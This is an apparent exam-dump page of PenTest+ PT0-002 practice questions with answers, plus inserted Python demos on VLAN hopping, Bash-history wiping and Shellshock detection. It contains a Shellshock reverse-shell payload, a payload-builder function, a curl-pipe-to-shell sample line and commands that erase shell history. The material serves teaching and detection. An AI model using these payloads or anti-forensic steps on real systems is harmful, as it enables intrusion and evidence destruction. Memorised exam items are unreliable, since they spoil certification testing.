PT0-002 Certification Exam Dumps Questions in here [Aug-2023]
Updated PT0-002 Exam Practice Test Questions
NEW QUESTION # 48
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
- A. Disable HTTP/301 redirect configuration.
- B. Implement a better method for authentication.
- C. Create an out-of-band network for management.
- D. Disable or upgrade SSH daemon.
- E. Enforce enhanced password complexity requirements.
- F. Eliminate network management and control interfaces.
Answer: B,C
Explanation:
The intercepted request carries the credentials in an HTTP Basic Authorization header over cleartext HTTP; the value is only Base64 encoded, not encrypted, so anyone on the path can recover the username and password. That calls for a better authentication method (B). The management interface is also reachable from the production network, so management traffic should be moved to a dedicated out-of-band network (C). Eliminating management interfaces altogether (F) is not practical, and stronger password complexity (E) does not help when the password is sent in the clear.
NEW QUESTION # 49
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
- A. Nessus
- B. Shodan
- C. Nmap
- D. WebScarab-NG
Answer: B
Explanation:
Shodan indexes banners and metadata from devices it has already scanned, so querying it reveals vendor, product, firmware and exposed-service details without sending a single packet to the target. Nmap and Nessus are active scanners and therefore do not support passive reconnaissance.
NEW QUESTION # 50
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
- A. may reduce the true positive rate of findings.
- B. will reveal vulnerabilities in the Modbus protocol.
- C. may cause unintended failures in control systems.
- D. will create a denial-of-service condition on the IP networks.
Answer: C
NEW QUESTION # 51
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
- A. RFID cloning
- B. RFID tagging
- C. Tag nesting
- D. Meta tagging
Answer: C
Explanation:
VLAN hopping by double tagging requires two 802.1Q tags nested in a single frame. The attacker crafts a frame whose outer tag carries the native VLAN ID of the trunk and whose inner tag carries the target VLAN ID. The first switch strips the outer tag because it matches the trunk's native VLAN and forwards the frame across the trunk with the inner tag still in place; the next switch reads that inner tag and delivers the frame into the target VLAN. The attack only works if the attacker's port is in the native VLAN of the trunk link, and it is one-way: replies from the victim are not tagged back to the attacker. Mitigations are to assign trunks an unused native VLAN ID and to force the native VLAN to be tagged. https://cybersecurity.att.com/blogs/security-essentials/vlan-hopping-and-mitigation
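The double-tagged frame described above, as an added example that is not part of the original page or of the AT&T post it cites: it builds an 802.1Q-in-802.1Q Ethernet frame with Python's struct module, parses the tag stack, and models the trunk-side behaviour that makes the hop possible. The MAC addresses, VLAN IDs, payload and the simplified switch model are constructed for illustration and do not represent any vendor's implementation.

```python
import struct
from typing import List, Tuple

TPID_8021Q = 0x8100       # EtherType value that announces an 802.1Q tag
ETHERTYPE_IPV4 = 0x0800

def vlan_tag(vid: int, pcp: int = 0) -> bytes:
    """Encode one 4-byte 802.1Q tag: TPID, then TCI = PCP(3 bits) | DEI(1) | VID(12)."""
    if not 0 <= vid < 4096:
        raise ValueError("VID must fit in 12 bits")
    return struct.pack("!HH", TPID_8021Q, (pcp << 13) | vid)

def build_frame(dst: bytes, src: bytes, vids: List[int], payload: bytes) -> bytes:
    """Ethernet frame with one tag per entry in `vids`, outermost first."""
    tags = b"".join(vlan_tag(v) for v in vids)
    return dst + src + tags + struct.pack("!H", ETHERTYPE_IPV4) + payload

def parse_tags(frame: bytes) -> Tuple[List[int], int]:
    """Walk the tag stack after the two MAC addresses; return (VIDs outer->inner, inner EtherType)."""
    vids: List[int] = []
    off = 12
    while True:
        (etype,) = struct.unpack_from("!H", frame, off)
        if etype != TPID_8021Q:
            return vids, etype
        (tci,) = struct.unpack_from("!H", frame, off + 2)
        vids.append(tci & 0x0FFF)
        off += 4

def trunk_ingress(frame: bytes, native_vid: int) -> bytes:
    """Constructed model of the behaviour the attack relies on: a tag that matches the
    trunk's native VLAN is stripped and the remainder of the frame is forwarded untouched,
    so a second tag underneath survives onto the trunk."""
    vids, _ = parse_tags(frame)
    if vids and vids[0] == native_vid:
        return frame[:12] + frame[16:]   # drop the 4-byte outer tag only
    return frame

# Constructed addresses and VLAN IDs for the demonstration.
ATTACKER_MAC = bytes.fromhex("020000000001")
BROADCAST = b"\xff" * 6
NATIVE_VID, TARGET_VID = 1, 20

def demo() -> Tuple[List[int], List[int]]:
    """Return the tag stack as sent by the attacker and as seen after the first switch."""
    frame = build_frame(BROADCAST, ATTACKER_MAC, [NATIVE_VID, TARGET_VID], b"\x45" + b"\x00" * 19)
    sent, _ = parse_tags(frame)
    forwarded, _ = parse_tags(trunk_ingress(frame, native_vid=NATIVE_VID))
    return sent, forwarded

if __name__ == "__main__":
    print(demo())   # ([1, 20], [20]): the frame is delivered into VLAN 20
```

Changing `native_vid` to anything other than the attacker's VLAN leaves the frame untouched, which is exactly why moving trunks to an unused native VLAN (or tagging the native VLAN) defeats the technique.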
NEW QUESTION # 52
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?
- A. User hashes sent over SMB
- B. Multiple handshakes
- C. IP addresses
- D. Encrypted file transfers
Answer: A
NEW QUESTION # 53
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
- A. Modify the malicious AP configuration to not use a pre-shared key.
- B. Send deauthentication frames to the stations.
- C. Set the malicious AP to broadcast within dynamic frequency selection channels.
- D. Perform jamming on all 2.4GHz and 5GHz channels.
Answer: B
Explanation:
Deauthentication frames are unauthenticated 802.11 management frames that disconnect stations from their current AP; when the stations reconnect, a nearby evil twin advertising the same SSID with a stronger signal can win the association. Jamming every channel is disruptive and usually outside the rules of engagement, and DFS channels have nothing to do with forcing clients to roam.
NEW QUESTION # 54
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
- A. Acceptance by the client and sign-off on the final report
- B. Scheduling of follow-up actions and retesting
- C. Review of the lessons learned during the engagement
- D. Attestation of findings and delivery of the report
Answer: D
Explanation:
Once the initial findings have been reviewed with the client, the tester attests to the findings and delivers the final report. Client acceptance and sign-off, lessons learned, and scheduling of follow-up actions or retesting are post-report-delivery activities and cannot happen before the report exists.
NEW QUESTION # 55
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contract with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
- A. Sending many web requests per second to test DDoS protection
- B. Fingerprinting all the IP addresses of the application's servers
- C. Brute forcing the application's passwords
- D. Crawling the web application's URLs looking for vulnerabilities
Answer: A
NEW QUESTION # 56
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
- A. Unsupported operating systems
- B. Inability to network
- C. The existence of default passwords
- D. Susceptibility to DDoS attacks
Answer: C
Explanation:
Default or hard-coded credentials are the most common weakness in Internet-facing IoT devices; they are what botnets such as Mirai use to take devices over. Unsupported operating systems and DDoS exposure are real problems, but they are consequences or secondary issues rather than the most common vulnerability.
NEW QUESTION # 57
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)
- A. Spawned shells
- B. Server logs
- C. ARP cache
- D. Administrator accounts
- E. Reboot system
- F. Created user accounts
Answer: A,F
Explanation:
Removing shells: remove any shell programs (web shells, reverse or bind shells) installed while performing the pentest.
Removing tester-created credentials: remove any user accounts created during the pentest, including backdoor accounts.
Removing tools: remove any software tools that were installed on the customer's systems to aid in the exploitation of systems.
Server logs and the client's existing administrator accounts belong to the client and must not be removed; deleting them would destroy evidence the client needs and exceed the engagement's scope.
NEW QUESTION # 58
A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?
- A. The web server is redirecting the requests.
- B. The web server is behind a load balancer.
- C. The local antivirus on the web server is rejecting the connection.
- D. The web server is using a WAF.
Answer: D
Explanation:
A Web Application Firewall (WAF) is designed to monitor, filter or block traffic to a web application. A WAF will monitor incoming and outgoing traffic from a web application and is often used to protect web servers from attacks such as SQL Injection, Cross-Site Scripting (XSS), and other forms of attacks. If a WAF detects an attack, it will often reset the TCP connection, causing the connection to be terminated. As a result, a penetration tester may see TCP resets when a WAF is present. Therefore, the most likely reason for the TCP resets returning from the web server is that the web server is using a WAF.
NEW QUESTION # 59
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
- A. Clarify the statement of work.
- B. Obtain an asset inventory from the client.
- C. Identify all third parties involved.
- D. Interview all stakeholders.
Answer: A
NEW QUESTION # 60
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
- A. Redirecting Bash history to /dev/null
- B. Making decoy files on the system to confuse incident responders
- C. Making a copy of the user's Bash history for further enumeration
- D. Covering tracks by clearing the Bash history
Answer: D
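The three commands above, reproduced in a scratch directory as an added example that is not part of the original page, together with the check a responder can still run afterwards. The history content, the "one month old" timestamp and the detection thresholds are constructed for illustration; the commands themselves are the ones from the question, run through /bin/sh.

```python
import os
import shutil
import subprocess
import tempfile
import time
from typing import Dict

# Constructed sample history; not taken from a real host.
SAMPLE_HISTORY = "ls -la\nsudo su\ncurl http://example.invalid/x.sh | sh\n"

# The tester's sequence from the question, exactly as typed in the user's home directory.
WIPE_COMMANDS = "cat /dev/null > temp && touch -r .bash_history temp && mv temp .bash_history"

def snapshot(path: str) -> Dict[str, int]:
    """The inode fields a responder compares: size, inode number, mtime and ctime."""
    st = os.stat(path)
    return {"size": st.st_size, "inode": st.st_ino,
            "mtime": int(st.st_mtime), "ctime": int(st.st_ctime)}

def wipe_history(home: str) -> None:
    """Run the tester's three commands inside `home`."""
    subprocess.run(["sh", "-c", WIPE_COMMANDS], cwd=home, check=True)

def looks_wiped(snap: Dict[str, int], min_gap_seconds: int = 3600) -> bool:
    """Heuristic for an emptied history with a forged mtime.
    touch -r copies atime/mtime only; ctime is kernel-owned and records the real
    moment the new file was created, so an empty history whose ctime is far newer
    than its mtime is suspicious. (Assumed threshold; tune it for the environment.)"""
    return snap["size"] == 0 and snap["ctime"] - snap["mtime"] > min_gap_seconds

def demo() -> Dict[str, Dict[str, int]]:
    """Create .bash_history with an old mtime, wipe it, and return before/after snapshots."""
    home = tempfile.mkdtemp()
    try:
        hist = os.path.join(home, ".bash_history")
        with open(hist, "w") as fh:
            fh.write(SAMPLE_HISTORY)
        old = int(time.time()) - 30 * 24 * 3600   # pretend it was last written a month ago
        os.utime(hist, (old, old))
        before = snapshot(hist)
        wipe_history(home)
        after = snapshot(hist)
    finally:
        shutil.rmtree(home)
    return {"before": before, "after": after}

if __name__ == "__main__":
    snaps = demo()
    for label, snap in snaps.items():
        print(label, snap)
    print("mtime preserved:", snaps["before"]["mtime"] == snaps["after"]["mtime"])
    print("inode replaced: ", snaps["before"]["inode"] != snaps["after"]["inode"])
    print("flagged:        ", looks_wiped(snaps["after"]))
```

The mtime survives, which is the point of `touch -r`, but `mv` replaces the file, so the inode number changes and ctime is reset to the present; neither can be forged with these commands. Note also that a still-open Bash session writes its in-memory history back to the file on exit, so a tester who only does this without `unset HISTFILE` (or `history -c`) leaves the session's later commands behind anyway.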
NEW QUESTION # 61
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:
The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?
- A. An account for RDP does not exist on the server.
- B. The tester input the incorrect IP address.
- C. PowerShell requires administrative privilege.
- D. The command requires the -port 135 option.
Answer: A
NEW QUESTION # 62
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
- A. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
- D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
Answer: C
Explanation:
The "() { ignored;};" prefix in the User-Agent header is a Shellshock (CVE-2014-6271) trigger: a vulnerable Bash run by the CGI handler executes whatever follows the function body. id and whoami print the account the handler runs as, which is the web server's user context. The other options open a reverse shell, list processes, or search for SUID binaries, none of which answers the question.
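The payload from the question, as an added example that is not part of the original page or the tester's script: one function builds the header dictionary for an arbitrary command (using `bash -c` so that a command list such as `id;whoami` is actually executed rather than treated as a script path), and the defensive half detects the same trigger pattern in web-server access logs. The log lines are constructed and the combined-log-format assumption is mine.

```python
import re
from typing import Dict, Iterable, List

def build_headers(command: str) -> Dict[str, str]:
    """Request headers carrying `command` in the User-Agent, Shellshock style.

    The "() { ...; };" prefix is the CVE-2014-6271 trigger; a vulnerable Bash
    started by the CGI handler runs what follows the closing brace.
    """
    payload = "() { ignored;};/bin/bash -c '" + command + "'"
    return {
        "User-Agent": payload,
        "Accept": "text/html,application/xhtml+xml,application/xml",
    }

# Detection side: an environment-variable value that starts with a Bash function
# definition, tolerant of the whitespace variants seen in the wild ("(){ :;};").
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

def is_shellshock(header_value: str) -> bool:
    return SHELLSHOCK_RE.search(header_value) is not None

def scan_access_log(lines: Iterable[str]) -> List[str]:
    """Return the lines whose User-Agent field carries a Shellshock prefix.

    Assumes the combined log format, where the User-Agent is the third
    double-quoted field: ... "REQUEST" status bytes "REFERER" "USER-AGENT".
    """
    hits: List[str] = []
    for line in lines:
        fields = line.split('"')
        user_agent = fields[5] if len(fields) >= 6 else ""
        if is_shellshock(user_agent):
            hits.append(line)
    return hits

# Constructed sample access-log lines (not real traffic); the last two carry payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2023:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"',
    '10.0.0.9 - - [01/Aug/2023:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "-" '
    '"() { ignored;};/bin/bash -c \'id;whoami\'"',
    '10.0.0.9 - - [01/Aug/2023:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "-" '
    '"() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1"',
]

if __name__ == "__main__":
    print(build_headers("id;whoami")["User-Agent"])
    for hit in scan_access_log(SAMPLE_LOG):
        print("SHELLSHOCK:", hit)
```

The regex keys on the function-definition prefix rather than on any particular command, so it catches both the reverse-shell payload from the question and the `id;whoami` variant; a WAF rule written the same way is what produces the TCP resets described in question 58.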
NEW QUESTION # 63
